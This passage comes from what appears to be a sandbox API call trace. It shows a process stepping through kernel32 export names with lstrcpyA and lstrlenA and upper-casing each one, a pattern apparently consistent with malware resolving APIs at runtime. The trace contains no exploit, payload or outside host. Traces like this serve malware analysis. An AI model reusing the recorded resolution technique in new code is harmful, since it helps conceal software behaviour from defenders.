lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.433] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.433] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.433] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.434] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.434] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.434] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.434] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.434] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.434] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.434] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.434] lstrlenA (lpString="BEEP") returned 4 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.434] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.434] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.434] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.434] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.434] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.434] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.434] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.434] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.434] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.434] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.435] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.435] lstrlenA (lpString="CANCELIO") returned 8 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.435] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.435] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.435] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.435] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.435] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.435] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.435] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.435] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.435] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.435] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.435] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.435] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.435] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.435] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.435] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.436] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.436] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.436] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.436] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.436] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.436] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.436] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.436] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.436] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.436] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.436] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.436] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.436] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.436] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.436] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.436] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.436] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.436] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.436] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.437] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.437] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.437] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.437] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.437] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.437] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.437] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.437] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.437] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.437] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.437] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.437] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.437] lstrlenA (lpString="COPYFILEA") returned 9 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.437] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.437] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.437] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.437] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.437] lstrlenA (lpString="COPYFILEW") returned 9 [0077.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.438] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.438] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.438] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.438] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.438] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.438] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.438] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.438] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.438] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.438] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.438] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.438] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.438] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.438] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.438] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.438] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.438] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.438] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.438] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.439] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.439] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.439] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.439] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.439] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.439] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.439] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.439] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.439] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.439] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.439] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.439] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.439] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.439] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.439] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.439] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.439] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.439] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.439] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.440] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.440] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.440] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.440] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.440] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.440] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.440] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.440] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.440] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.440] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.440] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.440] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.440] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.440] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: 